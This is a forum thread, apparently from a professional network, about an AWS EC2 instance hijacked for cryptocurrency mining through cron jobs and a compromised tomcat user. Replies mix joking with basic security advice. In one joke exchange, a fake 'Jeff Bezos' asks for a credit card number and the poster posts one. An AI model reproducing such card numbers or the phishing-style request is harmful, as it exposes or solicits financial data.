My EC2 instance was hacked.Whom do I contact to share details.

Deutsche Bank k1hgk
May 15, 2018 27 Comments

I want to share logs and some traces.

comments

Want to comment? LOG IN or SIGN UP
TOP 27 Comments
  • Amazon / Eng Iomnbvc
    Jeff@amazon.com
    May 15, 2018 3
    • Oscar / Eng
      dumb|dumb

      Oscar Eng

      BIO
      Fuck you, but wats up bro.
      dumb|dumbmore
      My name is Jeff.
      May 15, 2018
    • Amazon Jeff Bеzоs
      How can I be of service, Sir?
      May 15, 2018
    • New / Eng CECA
      Wow, so customer centric Jeff
      May 15, 2018
  • Amazon Jeff Bеzоs
    Please enter your credit card account number below so that my Engineer can pull up your data account numbers and investigate this Very unfortunate accident. Thank you, Sir!
    May 15, 2018 1
    • Deutsche Bank k1hgk
      OP
      Here you go Jeff. 4112 7358 0521 9252. If you have further questions pm me.
      May 16, 2018
  • Daimler BigInJapаn
    911
    May 15, 2018 0
  • Google / Eng Abfxs
    Did you upload your private keys on github? Try using Gcloud, it has better security features like no ssh key management.
    May 15, 2018 5
    • Oscar / Eng
      dumb|dumb

      Oscar Eng

      BIO
      Fuck you, but wats up bro.
      dumb|dumbmore
      How do you login?
      May 15, 2018
    • Google / Eng Abfxs
      https://cloud.google.com/sdk/gcloud/reference/compute/ssh

      Basically cli has wrapper over ssh which handles public/private keys per project. When you update key pair, it automatically updates all VMs.
      May 15, 2018
    • Microsoft Mutex07
      What if you have to share keys with a teammate?
      May 15, 2018
    • Deutsche Bank k1hgk
      OP
      No I have some github repos but nothing keys over there.
      May 16, 2018
    • Deutsche Bank k1hgk
      OP
      Well it’s my small side project and I am only person working on it.
      May 16, 2018
  • Deutsche Bank k1hgk
    OP
    I have taken tcpdump and can clearly see calls going back and forth between ec2 instance and some Chinese and German and Russian servers.those are all json rpc with stratum tcp protocol.Seems like they were looking for some computing resource for generating hash for crypto currency.
    May 16, 2018 1
    • Oscar / Eng
      dumb|dumb

      Oscar Eng

      BIO
      Fuck you, but wats up bro.
      dumb|dumbmore
      Typical hack.
      May 16, 2018
  • Deutsche Bank k1hgk
    OP
    The person who hacked my account installed some jobs under cron and was executing some programs under var/tmp folder with tomcat user permission. They were executing some shell script by making http call.Vow seems like my server was accessed from every part of world.
    May 16, 2018 3
    • Oscar / Eng
      dumb|dumb

      Oscar Eng

      BIO
      Fuck you, but wats up bro.
      dumb|dumbmore
      Either your kernel was extremely vulnerable or you had a mess up permission setup. On a serious note, you still have basic support if you are not a business user. Just shutoff the machine and tell them what had happened. Someone will reply back to you.
      May 16, 2018
    • Facebook / Creative
      So entry point was your tomcat? Did they get root or they stayed tomcat?
      May 16, 2018
    • Deutsche Bank k1hgk
      OP
      I don’t know if the entry point was tomcat but I am suspecting it to be entry point. It was running as tomcat user.Other entry is the yum packages which I trying for lets encrypt ssl. Other than these there was nothing on the box.
      May 16, 2018
  • Amazon Safeway
    Did the EC2 team go through Infosec approval?
    May 16, 2018 1
    • Amazon / Eng
      Hooliganss

      Amazon Eng

      BIO
      AWS
      Hooliganssmore
      Lol yes.
      May 16, 2018
  • Amazon / Eng
    Hooliganss

    Amazon Eng

    BIO
    AWS
    Hooliganssmore
    Lol, how was it hacked? And what kind of ec2 (reserved, spot, on demand, etc)?
    May 15, 2018 1
    • Deutsche Bank k1hgk
      OP
      I have a basic instance for which I pay roughly 25 USD a month.i don’t know how they gained access but I feel they might haves got root access either via some yum packages or via tomcat. I did try let’s encrypt stuff in last 4 days and that the only I recollect.
      May 16, 2018
  • Deutsche Bank k1hgk
    OP
    Damm it I get more bots traffic than user traffic now a days. I have taken infrastructure offline. Maybe I will patch up everything correctly and then start fresh. Will raise ticket Amazon today evening.
    May 16, 2018 0
  • Deutsche Bank k1hgk
    OP
    Actually I have the keys stored in my Dropbox folder and I use putty with keys to login.
    May 16, 2018 0
  • Verizon cicdaws
    Hacked how? Did you enable password auth and setup a stupid password?
    May 15, 2018 0
  • Oscar / Eng
    dumb|dumb

    Oscar Eng

    BIO
    Fuck you, but wats up bro.
    dumb|dumbmore
    Next time use spot instances.
    May 15, 2018 0

Salary
Comparison

    Real time salary information from verified employees